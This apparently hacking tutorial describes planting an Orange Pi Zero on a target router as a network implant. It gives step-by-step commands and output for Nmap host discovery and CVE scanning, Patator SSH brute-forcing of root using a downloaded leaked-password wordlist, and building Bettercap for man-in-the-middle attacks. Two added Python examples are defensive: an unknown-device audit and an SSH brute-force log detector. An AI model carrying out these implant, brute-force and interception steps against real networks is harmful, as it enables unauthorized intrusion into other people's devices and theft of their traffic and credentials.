With a tiny computer, hackers can see every website you visit, exploit services on the network, and break into your Wi-Fi router's gateway to manipulate sensitive settings. These attacks can be performed from anywhere once the attacker's computer has been connected to the router via a network implant.
The Orange Pi Zero and Armbian operating system must first be set up for remote access and network-based attacks before proceeding. The operating system is not weaponized out of the box, so be sure to review my previous article on setting everything up first. This kind of attack can be performed with a Raspberry Pi as well, but the below installation commands were only tested with the Orange Pi Zero.
- Previously: How to Set Up Network Implants with a Cheap SBC
This article will focus on performing several network-based attacks after the Orange Pi Zero has been planted on the target router. The tools and attacks featured here are far from a complete depiction of how much damage an attacker can inflict on a network, but they are a good start at showing how dangerous a network implant can be in the wrong hands.
1. Perform Network Recon & CVE Detection with Nmap
Nmap is one of the essential network-mapping tools. We can begin by installing it on the Orange Pi Zero with the following apt-get commands.
root@orangepizero:~# apt-get update && apt-get install nmap
Next, install some useful NSE scripts such as nmap-vulners and vulscan, as shown in my previous article on detecting CVEs with Nmap scripts. Once those tools are loaded onto the Orange Pi Zero, start by identifying the IP address, netmask, and route the target router has assigned to it.
root@orangepizero:~# ip addr
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff
inet 192.168.8.138/24 brd 192.168.8.255 scope global dynamic eth0
valid_lft 86056sec preferred_lft 86056sec
inet6 xxxx::xxxx:xxxx:xxxx:xxxx/64 scope link
valid_lft forever preferred_lft forever
We can see the 192.168.8.138/24 address and presume the router is at 192.168.8.1, which can be verified with the ip route command. Then, perform a ping scan (-sn) on the entire network to discover available hosts.
root@orangepizero:~# nmap -sn 192.168.8.1/24
Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC
Nmap scan report for 192.168.8.1
Host is up (0.00038s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.2
Host is up (0.00049s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.179
Host is up (-0.088s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Sony)
Nmap scan report for 192.168.8.183
Host is up (-0.10s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Unknown)
Nmap scan report for 192.168.8.138
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds
If, for example, we found the Sony device on 192.168.8.183 to be interesting, we could further probe that host.
root@orangepizero:~# nmap -sV -T4 --script nmap-vulners -F -A 192.168.8.183
Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:19 UTC
Nmap scan report for 192.168.8.183
Host is up (0.00080s latency).
Not shown: 99 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.6p1:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|_ CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
MAC Address: 48:1C:52:9F:A6:71 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see the nmap-vulners NSE script discovered two CVEs for this particular SSH server. The host is almost certainly an Ubuntu machine, so automated updates have probably done a good job of patching severe security vulnerabilities.
We could further probe the service or other hosts on the network with more advanced Nmap scans and scripts. For more on Nmap, check out some of the following articles.
- Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should Know
- How to Automate Brute-Force Attacks for Nmap Scans
- Using the Nmap Scripting Engine (NSE) for Reconnaissance
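The defender's counterpart to the ping scan above is to compare what the scan finds against a list of devices that are supposed to be on the network. The following is an added example (not code from the article): it parses the normal-output format nmap printed above (nmap's -oX XML output is the more robust input, but this is what the article shows) and flags any live host whose MAC is not in an inventory. The scan output, the MAC addresses and the inventory are constructed; the article redacts the real MACs.

```python
import re

# Constructed `nmap -sn 192.168.8.1/24` normal output, modelled on the ping
# scan above but run from the administrator's own host at 192.168.8.183.
# The MAC addresses are made up (the article redacts the real ones).
SAMPLE_PING_SCAN = """\
Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC
Nmap scan report for 192.168.8.1
Host is up (0.00038s latency).
MAC Address: 02:00:00:00:08:01 (Mediabridge Products)
Nmap scan report for 192.168.8.2
Host is up (0.00049s latency).
MAC Address: 02:00:00:00:08:02 (Mediabridge Products)
Nmap scan report for 192.168.8.138
Host is up (0.0011s latency).
MAC Address: 02:00:00:00:08:38 (Unknown)
Nmap scan report for 192.168.8.179
Host is up (0.088s latency).
MAC Address: 02:00:00:00:08:79 (Sony)
Nmap scan report for 192.168.8.183
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds
"""

# Constructed inventory of the devices the administrator knows to be on the LAN.
KNOWN_DEVICES = {
    "02:00:00:00:08:01": "router (gateway)",
    "02:00:00:00:08:02": "router (second interface)",
    "02:00:00:00:08:79": "Sony TV",
}

REPORT_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?$")
MAC_RE = re.compile(
    r"^MAC Address: (?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}) \((?P<vendor>[^)]*)\)"
)


def parse_ping_scan(text):
    """Parse nmap -sn normal output into [{'ip', 'mac', 'vendor'}, ...].

    Hosts nmap reports with a resolved name appear as 'name (ip)'; the IP is
    taken from the parentheses in that case. The scanning host itself never
    gets a MAC line, so its 'mac' stays None.
    """
    hosts, current = [], None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = {"ip": m["ip"] or m["name"], "mac": None, "vendor": None}
            hosts.append(current)
            continue
        m = MAC_RE.match(line)
        if m and current is not None:
            current["mac"] = m["mac"].upper()
            current["vendor"] = m["vendor"]
    return hosts


def audit_hosts(hosts, inventory):
    """Classify each live host as 'known', 'scanner' or 'UNKNOWN'.

    Returns (ip, status, detail) tuples; the UNKNOWN entries are the ones
    worth physically tracing back to a port on the router.
    """
    findings = []
    for h in hosts:
        if h["mac"] is None:
            findings.append((h["ip"], "scanner", "no MAC line: this host ran the scan"))
        elif h["mac"] in inventory:
            findings.append((h["ip"], "known", inventory[h["mac"]]))
        else:
            findings.append((h["ip"], "UNKNOWN", f"{h['mac']} ({h['vendor']})"))
    return findings


if __name__ == "__main__":
    for ip, status, detail in audit_hosts(parse_ping_scan(SAMPLE_PING_SCAN), KNOWN_DEVICES):
        print(f"{ip:<15} {status:<8} {detail}")
```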
2. Perform Brute-Force Attacks with Patator
Like Hydra and Medusa, Patator is a highly flexible, full-featured, command-line brute-forcing tool. It has quickly become one of my favorite hacking instruments. In my previous article, Patator was used to perform a dictionary attack against different router gateways, which is very appropriate for a network-based attack such as this Orange Pi Zero hack. This time, however, I'll show Patator's SSH brute-forcing module.
- Don't Miss: How to Break into Router Gateways with Patator
First, install the dependencies required by the Patator Python script. There are quite a few packages, so this process can take up to ten minutes to complete. Prepending the screen command is recommended (Screen must be installed). If the SSH connection breaks, Screen keeps the installation running, and the session can be reattached once the connection is re-established.
root@orangepizero:~# screen apt-get install libcurl4-openssl-dev python3-dev libssl-dev ldap-utils default-libmysqlclient-dev ike-scan unzip default-jdk libsqlite3-dev libsqlcipher-dev python-setuptools python-pip libpq-dev python-dev libffi6 libffi-dev pkg-config autoconf python-dev cmake
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
adwaita-icon-theme ca-certificates-java default-jdk default-jdk-headless default-jre default-jre-headless fontconfig fontconfig-config fonts-dejavu-core gtk-update-icon-cache hicolor-icon-theme ike-scan
java-common ldap-utils libasyncns0 libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libatspi2.0-0 libavahi-client3 libavahi-common-data libavahi-common3
libcairo-gobject2 libcairo2 libcolord2 libcroco3 libcups2 libcurl4-openssl-dev libdatrie1 libdrm2 libegl1-mesa libepoxy0 libexpat1-dev libflac8 libfontconfig1 libfontenc1 libfreetype6 libgbm1
libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif7 libgl1-mesa-glx libglapi-mesa libgraphite2-3 libgtk-3-0 libgtk-3-common libgtk2.0-0 libgtk2.0-common libharfbuzz0b libice6 libjbig0 libjpeg62-turbo
libjson-glib-1.0-0 libjson-glib-1.0-common liblcms2-2 libnspr4 libnss3 libogg0 libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libpixman-1-0 libpulse0 libpython3-dev libpython3.5 libpython3.5-dev
librest-0.7-0 librsvg2-2 librsvg2-common libsm6 libsndfile1 libsoup-gnome2.4-1 libsqlcipher-dev libsqlcipher0 libsqlite3-dev libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libwayland-client0
libwayland-cursor0 libwayland-egl1-mesa libwayland-server0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-render0 libxcb-shape0 libxcb-shm0
libxcb-sync1 libxcb-xfixes0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbcommon0 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxshmfence1
libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 openjdk-8-jdk openjdk-8-jdk-headless openjdk-8-jre openjdk-8-jre-headless python3-dev python3.5-dev shared-mime-info x11-common x11-utils
0 upgraded, 131 newly installed, 0 to remove and 0 not upgraded.
Need to get 112 MB of archives.
After this operation, 312 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Upgrade the setuptools and wheel packages using the following pip command.
root@orangepizero:~# pip install --upgrade setuptools wheel
Collecting setuptools
Downloading https://files.pythonhosted.org/packages/c8/b0/cc6b7ba28d5fb790cf0d5946df849233e32b8872b6baca10c9e002ff5b41/setuptools-41.0.0-py2.py3-none-any.whl (575kB)
100% |████████████████████████████████| 583kB 181kB/s
Installing collected packages: setuptools
Found existing installation: setuptools 33.1.1
Not uninstalling setuptools at /usr/lib/python2.7/dist-packages, outside environment /usr
Successfully installed setuptools-41.0.0
Clone the Patator GitHub repository with the git command.
root@orangepizero:~# git clone https://github.com/lanjelot/patator/ /opt/patator
Cloning into '/opt/patator'...
remote: Enumerating objects: 457, done.
remote: Total 457 (delta 0), reused 0 (delta 0), pack-reused 457
Receiving objects: 100% (457/457), 325.11 KiB | 149.00 KiB/s, done.
Resolving deltas: 100% (157/157), done.
Change (cd) into the new /opt/patator/ directory.
root@orangepizero:~# cd /opt/patator/
Then, use pip again to install more requirements. This process can take up to 20 minutes to complete. The pynacl and cryptography packages seemed to take especially long in my tests, so be patient.
root@orangepizero:/opt/patator# pip install -r requirements.txt
Downloading https://files.pythonhosted.org/packages/cf/ae/94e70d49044ccc234bfdba20114fa947d7ba6eb68a2e452d89b920e62227/paramiko-2.4.2-py2.py3-none-any.whl (193kB)
100% |████████████████████████████████| 194kB 216kB/s
Collecting pycurl (from -r requirements.txt (line 2))
Downloading https://files.pythonhosted.org/packages/e8/e4/0dbb8735407189f00b33d84122b9be52c790c7c3b25286826f4e1bdb7bde/pycurl-7.43.0.2.tar.gz (214kB)
100% |████████████████████████████████| 215kB 172kB/s
Collecting ajpy (from -r requirements.txt (line 3))
Downloading https://files.pythonhosted.org/packages/12/dd/e641d8c0b3b14eed50122a3c090ff9150bd0988fd0790d4819cd8083e83d/ajpy-0.0.4.tar.gz
Collecting pyopenssl (from -r requirements.txt (line 5))
Downloading https://files.pythonhosted.org/packages/01/c8/ceb170d81bd3941cbeb9940fc6cc2ef2ca4288d0ca8929ea4db5905d904d/pyOpenSSL-19.0.0-py2.py3-none-any.whl (53kB)
100% |████████████████████████████████| 61kB 66kB/s
Collecting cx_Oracle (from -r requirements.txt (line 6))
Downloading https://files.pythonhosted.org/packages/4b/aa/99e49d10e56ff0263a8927f4ddb7e8cdd4671019041773f61b3259416043/cx_Oracle-7.1.2.tar.gz (289kB)
100% |████████████████████████████████| 296kB 177kB/s
Collecting mysqlclient (from -r requirements.txt (line 7))
Downloading https://files.pythonhosted.org/packages/f4/f1/3bb6f64ca7a429729413e6556b7ba5976df06019a5245a43d36032f1061e/mysqlclient-1.4.2.post1.tar.gz (85kB)
100% |████████████████████████████████| 92kB 98kB/s
Collecting psycopg2-binary (from -r requirements.txt (line 8))
Downloading https://files.pythonhosted.org/packages/dc/93/bb5655730913b88f9068c6b596177d1df83be0d476671199e17b06ea8436/psycopg2-binary-2.8.2.tar.gz (369kB)
100% |████████████████████████████████| 378kB 169kB/s
Collecting pycrypto (from -r requirements.txt (line 9))
Downloading https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz (446kB)
100% |████████████████████████████████| 450kB 114kB/s
...
Stored in directory: /root/.cache/pip/wheels/43/61/c8/0a4464601ce180d26e0a8dfdfa88c824e419dcc65bd43bda6e
Running setup.py bdist_wheel for bcrypt ... done
Stored in directory: /root/.cache/pip/wheels/6c/f0/60/8a8ebee44d14d3d6696f1e78960500777cb5b579caf33c1fe3
Running setup.py bdist_wheel for pycryptodomex ... done
Stored in directory: /root/.cache/pip/wheels/83/37/75/85a95885e1e48d22cc6c964680e7938a19ca7c80eb814b2ff0
Running setup.py bdist_wheel for cffi ... done
Stored in directory: /root/.cache/pip/wheels/bb/f8/22/e3e8d9dd87e0cc6df8201325bd0ae815e701d1ef2b95571cf2
Successfully built pycurl ajpy cx-Oracle mysqlclient psycopg2-binary pycrypto IPy pynacl cryptography bcrypt pycryptodomex cffi
Installing collected packages: cffi, pynacl, asn1crypto, enum34, ipaddress, cryptography, bcrypt, pyasn1, paramiko, pycurl, ajpy, pyopenssl, cx-Oracle, mysqlclient, psycopg2-binary, pycrypto, dnspython, IPy, pycryptodomex, ply, pysmi, pysnmp
Successfully installed IPy-1.0 ajpy-0.0.4 asn1crypto-0.24.0 bcrypt-3.1.6 cffi-1.12.2 cryptography-2.6.1 cx-Oracle-7.1.2 dnspython-1.16.0 enum34-1.1.6 ipaddress-1.0.22 mysqlclient-1.4.2.post1 paramiko-2.4.2 ply-3.11 psycopg2-binary-2.8.1 pyasn1-0.4.5 pycrypto-2.6.1 pycryptodomex-3.8.1 pycurl-7.43.0.2 pynacl-1.3.0 pyopenssl-19.0.0 pysmi-0.3.3 pysnmp-4.4.9
When that's done, verify Patator is working and view available modules with the --help option.
root@orangepizero:/opt/patator# ./patator.py --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help
Available modules:
+ ftp_login : Brute-force FTP
+ ssh_login : Brute-force SSH
+ telnet_login : Brute-force Telnet
+ smtp_login : Brute-force SMTP
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ finger_lookup : Enumerate valid users using Finger
+ http_fuzz : Brute-force HTTP
+ rdp_gateway : Brute-force RDP Gateway
+ ajp_fuzz : Brute-force AJP
+ pop_login : Brute-force POP3
+ pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
+ imap_login : Brute-force IMAP4
+ ldap_login : Brute-force LDAP
+ smb_login : Brute-force SMB
+ smb_lookupsid : Brute-force SMB SID-lookup
+ rlogin_login : Brute-force rlogin
+ vmauthd_login : Brute-force VMware Authentication Daemon
+ mssql_login : Brute-force MSSQL
+ oracle_login : Brute-force Oracle
+ mysql_login : Brute-force MySQL
+ mysql_query : Brute-force MySQL queries
+ rdp_login : Brute-force RDP (NLA)
+ pgsql_login : Brute-force PostgreSQL
+ vnc_login : Brute-force VNC
+ dns_forward : Forward DNS lookup
+ dns_reverse : Reverse DNS lookup
+ snmp_login : Brute-force SNMP v1/2/3
+ ike_enum : Enumerate IKE transforms
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files
+ sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
+ umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
+ tcp_fuzz : Fuzz TCP services
+ dummy_test : Testing module
The very same SSH service, discovered previously, can now be brute-forced using Patator's ssh_login module. To view the available ssh_login options, use the below command.
root@orangepizero:/opt/patator# ./patator.py ssh_login
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: ssh_login <module-options ...> [global-options ...]
Examples:
ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
Module options:
host : target host
port : target port [22]
user : usernames to test
password : passwords to test
auth_type : type of password authentication to use [password|keyboard-interactive|auto]
keyfile : file with RSA, DSA or ECDSA private key to test
persistent : use persistent connections [1|0]
For a more complete, comprehensive list of options and arguments, use the ssh_login and --help options together.
root@orangepizero:/opt/patator# ./patator.py ssh_login --help
For demonstration purposes, I'm using a wordlist created from leaked password databases. This can be quickly downloaded onto the Orange Pi Zero with the below wget command.
root@orangepizero:/opt/patator# wget 'https://git.io/fhhvc' -O /tmp/simple_wordlist.txt
--2019-04-15 02:19:09-- https://git.io/fhhvc
Resolving git.io (git.io)... 52.203.53.176
Connecting to git.io (git.io)|52.203.53.176|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-04-15 02:19:13-- https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: ‘/tmp/simple_wordlist.txt’
/tmp/simple_wordlist.txt 100%[==============================>] 24.99K 59.7KB/s in 0.4s
2019-04-15 02:19:22 (59.7 KB/s) - ‘/tmp/simple_wordlist.txt’ saved [25585/25585]
Finally, brute-force the SSH service using the following Patator command.
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1
INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-04-14 07:25 UTC
INFO -
INFO - code size time | candidate | num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 1 22 2.005 | 123456 | 1 | Authentication failed.
INFO - 1 22 2.277 | Abcdef123 | 2 | Authentication failed.
INFO - 1 22 1.344 | a123456 | 3 | Authentication failed.
INFO - 1 22 1.814 | little123 | 4 | Authentication failed.
INFO - 1 22 2.081 | nanda334 | 5 | Authentication failed.
INFO - 1 22 2.023 | N97nokia | 6 | Authentication failed.
INFO - 1 22 1.676 | password | 7 | Authentication failed.
INFO - 1 22 2.249 | Pawerjon123 | 8 | Authentication failed.
INFO - 1 22 2.180 | 421uiopy258 | 9 | Authentication failed.
INFO - 1 22 2.116 | MYworklist123 | 10 | Authentication failed.
INFO - 1 22 1.879 | 12345678 | 11 | Authentication failed.
INFO - 1 22 2.015 | qwerty | 12 | Authentication failed.
INFO - 1 22 1.772 | nks230kjs82 | 13 | Authentication failed.
INFO - 1 22 2.212 | trustno1 | 14 | Authentication failed.
INFO - 1 22 1.631 | zxcvbnm | 15 | Authentication failed.
INFO - 1 22 2.116 | N97nokiamini | 16 | Authentication failed.
INFO - 1 22 2.050 | letmein | 17 | Authentication failed.
INFO - 1 22 1.814 | 123456789 | 18 | Authentication failed.
INFO - 1 22 2.107 | myplex | 19 | Authentication failed.
INFO - 1 22 0.042 | tokyoneon | 20 | Authentication failed.
INFO - 1 22 2.375 | gm718422@ | 21 | Authentication failed.
INFO - 1 22 1.613 | churu123A | 22 | Authentication failed.
INFO - 1 22 1.914 | abc123 | 23 | Authentication failed.
INFO - 1 22 1.820 | plex123 | 24 | Authentication failed.
INFO - 1 22 1.778 | any123456 | 25 | Authentication failed.
INFO - 1 22 2.048 | Lwf1681688 | 26 | Authentication failed.
INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 0 r/s, Time: 0h 0m 51s
Patator will brute-force the host= on the specified port= with the wordlist supplied as FILE0 (0=). To avoid overwhelming the SSH service with too many password attempts per second, use -t to set the number of concurrent threads. The default is ten; increase or decrease it as needed.
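From the SSH server's side, the run above leaves a very recognisable trail in /var/log/auth.log: a burst of "Failed password" lines from one source, and, if a guess or a reused credential lands, an "Accepted password" from that same source shortly after. The following is an added example (not code from the article or from Patator) of the sliding-window detection a defender would run over those lines. The log excerpt is constructed to resemble what the Ubuntu host at 192.168.8.183 would record during the single-threaded run; every timestamp, PID and port in it is made up, and the threshold of 10 failures in 60 seconds is an assumed tuning value.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed /var/log/auth.log excerpt: what sshd on the Ubuntu host at
# 192.168.8.183 would record during the Patator run above (-t 1 gives
# roughly one attempt every two seconds). Timestamps, PIDs and ports are
# made up; the Accepted line for another host is included as benign noise.
SAMPLE_AUTH_LOG = """\
Apr 15 07:25:02 ubuntu sshd[2231]: Failed password for root from 192.168.8.138 port 40212 ssh2
Apr 15 07:25:04 ubuntu sshd[2233]: Failed password for root from 192.168.8.138 port 40214 ssh2
Apr 15 07:25:06 ubuntu sshd[2235]: Failed password for root from 192.168.8.138 port 40216 ssh2
Apr 15 07:25:08 ubuntu sshd[2237]: Failed password for root from 192.168.8.138 port 40218 ssh2
Apr 15 07:25:10 ubuntu sshd[2239]: Failed password for root from 192.168.8.138 port 40220 ssh2
Apr 15 07:25:11 ubuntu sshd[2240]: Accepted publickey for backup from 192.168.8.179 port 51000 ssh2
Apr 15 07:25:12 ubuntu sshd[2241]: Failed password for root from 192.168.8.138 port 40222 ssh2
Apr 15 07:25:14 ubuntu sshd[2243]: Failed password for root from 192.168.8.138 port 40224 ssh2
Apr 15 07:25:16 ubuntu sshd[2245]: Failed password for root from 192.168.8.138 port 40226 ssh2
Apr 15 07:25:18 ubuntu sshd[2247]: Failed password for root from 192.168.8.138 port 40228 ssh2
Apr 15 07:25:20 ubuntu sshd[2249]: Failed password for invalid user admin from 192.168.8.138 port 40230 ssh2
Apr 15 07:25:22 ubuntu sshd[2251]: Disconnected from authenticating user root 192.168.8.138 port 40230 [preauth]
Apr 15 07:25:45 ubuntu sshd[2260]: Accepted password for tokyoneon from 192.168.8.138 port 40300 ssh2
"""

# One sshd authentication result line, with or without the "invalid user" prefix.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\S+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
_EPOCH = datetime(1900, 1, 1)  # syslog lines carry no year; strptime defaults to 1900


def _seconds(ts):
    """Syslog timestamp -> seconds on a year-less clock, good enough for windowing."""
    return (datetime.strptime(ts, "%b %d %H:%M:%S") - _EPOCH).total_seconds()


def detect_ssh_bruteforce(lines, threshold=10, window=60):
    """Return alerts as (kind, ip, user, ts, failures_in_window) tuples.

    kind is 'brute_force' when a source reaches `threshold` failed logins
    within `window` seconds, or 'success_after_failures' when a login is
    accepted from a source that still has failures inside the window (the
    shape of a guessed or reused password).
    """
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # disconnects, key-exchange chatter, non-sshd lines
        t, ip = _seconds(m["ts"]), m["ip"]
        recent = failures[ip]
        while recent and t - recent[0] > window:
            recent.popleft()  # slide the window forward
        if m["result"] == "Failed":
            recent.append(t)
            if len(recent) == threshold:  # fire once, as the threshold is crossed
                alerts.append(("brute_force", ip, m["user"], m["ts"], len(recent)))
        elif recent:
            alerts.append(("success_after_failures", ip, m["user"], m["ts"], len(recent)))
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

The same logic applied to the later single-credential check against 192.168.8.183 yields the 'success_after_failures' alert alone, which is why that event deserves a look even when the failure count never reached the threshold.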
3. Perform Man-in-the-Middle Attacks with Bettercap
Before installing Bettercap, the Go (Golang) programming language needs to be installed. Bettercap requires a newer version of Go than the one available in the Debian repositories. To get the latest version of Go, start by installing the build dependencies.
root@orangepizero:~# apt-get install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
build-essential is already the newest version (12.3).
golang is already the newest version (2:1.7~5).
The following additional packages will be installed:
libnetfilter-queue1 libnfnetlink-dev libpcap0.8-dev pkg-config
Recommended packages:
libusb-1.0-doc
The following NEW packages will be installed:
libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libpcap-dev libpcap0.8-dev libusb-1.0-0-dev pkg-config
0 upgraded, 7 newly installed, 0 to remove and 0 not upgraded.
Need to get 405 kB of archives.
After this operation, 1,142 kB of additional disk space will be used.
Do you want to continue? [Y/n]
If you're not already in the /root/ directory, change into it for the following commands. Using the /tmp directory isn't advised, as the Orange Pi Zero may run out of memory during some of these steps.
root@orangepizero:~# cd /root/
Then, download the tar.gz file containing the Golang source code.
root@orangepizero:~# wget 'https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz'
--2019-04-13 19:52:48-- https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz
Resolving dl.google.com (dl.google.com)... 172.217.194.93, 172.217.194.136, 172.217.194.190, ...
Connecting to dl.google.com (dl.google.com)|172.217.194.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 106218905 (101M) [application/octet-stream]
Saving to: ‘go1.12.7.linux-armv6l.tar.gz’
go1.12.7.linux-armv6l.tar.gz 100%[==============================>] 101.30M 3.28MB/s in 34s
2019-04-13 19:53:22 (3.02 MB/s) - ‘go1.12.7.linux-armv6l.tar.gz’ saved [106218905/106218905]
Next, unpack the compressed tar.gz file.
root@orangepizero:~# tar -C /usr/local -xzf go1.*.tar.gz
The $PATH needs to be defined to perform the following commands.
root@orangepizero:~# export PATH=$PATH:/usr/local/go/bin
Now, before cloning the Bettercap repository, the amount of available swap on the Orange Pi Zero needs to be expanded. Swap is a region of the storage device that the operating system sets aside as overflow for RAM. When all of the available hardware RAM (512 MB on the Orange Pi Zero) is in use, the operating system spills over into swap.
To create a new swap area, use the below dd command to write a 2 GB file (2048 blocks of 1 MB) of zeros read from /dev/zero. This command should take about three minutes to complete.
root@orangepizero:~# dd if=/dev/zero of=/root/swapfile bs=1M count=2048
2048+0 records in
2048+0 records out
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 195.927 s, 11.0 MB/s
Then, use the mkswap command. Disregard the "insecure permissions" warning; it is pointing out that the file is world-readable (0644) where 0600 is expected. On a non-hacking system you would tighten the permissions first, but it's not essential to this specific scenario.
root@orangepizero:~# mkswap /root/swapfile
mkswap: /root/swapfile: insecure permissions 0644, 0600 suggested.
Setting up swapspace version 1, size = 2 GiB (2147479552 bytes)
no label, UUID=e629a001-7a20-4346-8479-4a04fae459af
Enable the new swap area with the swapon command.
root@orangepizero:~# swapon /root/swapfile
swapon: /root/swapfile: insecure permissions 0644, 0600 suggested.
The new swap space can be verified using the free command to view available memory.
root@orangepizero:~# free -ht
total used free shared buff/cache available
Mem: 493M 84M 9.0M 604K 399M 397M
Swap: 2.2G 19M 2.2G
Total: 2.7G 104M 2.2G
Notice the Swap: is over 2 GB. Now, back to the Bettercap install process. Clone the Bettercap GitHub repository with the following go command.
root@orangepizero:~# go get github.com/bettercap/bettercap
Then, define the $GOPATH with the export command.
root@orangepizero:~# export GOPATH=/root/go/
Change into the newly created Bettercap directory.
root@orangepizero:~# cd $GOPATH/src/github.com/bettercap/bettercap
Execute the make build command. No output will occur.
root@orangepizero:~/go/src/github.com/bettercap/bettercap# make build
Finally, install Bettercap with the make install command.
root@orangepizero:~/go/src/github.com/bettercap/bettercap# make install
To start using Bettercap, use the following command with the -iface option to specify the target (router) interface. Otherwise, Bettercap might attack devices authenticated to the Orange Pi Zero's Wi-Fi hotspot — if that was set up previously.
Screen is also recommended here. It will keep Bettercap running persistently if you choose to temporarily disconnect from the Orange Pi Zero and reconnect at a later time.
root@orangepizero:~/go/src/github.com/bettercap/bettercap# screen bettercap -iface eth0
bettercap v2.23 (built for linux arm with go1.12.4) [type 'help' for a list of commands]
192.168.8.0/24 > 192.168.8.138 »
For starters, we can use the help command to view available options and running modules.
10.#.#.#/24 > 10.#.#.## » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Modules
any.proxy > not running
api.rest > not running
arp.spoof > not running
ble.recon > not running
caplets > not running
dhcp6.spoof > not running
dns.spoof > not running
events.stream > running
gps > not running
hid > not running
http.proxy > not running
http.server > not running
https.proxy > not running
https.server > not running
mac.changer > not running
mysql.server > not running
net.probe > not running
net.recon > not running
net.sniff > not running
packet.proxy > not running
syn.scan > not running
tcp.proxy > not running
ticker > not running
ui > not running
update > not running
wifi > not running
wol > not running
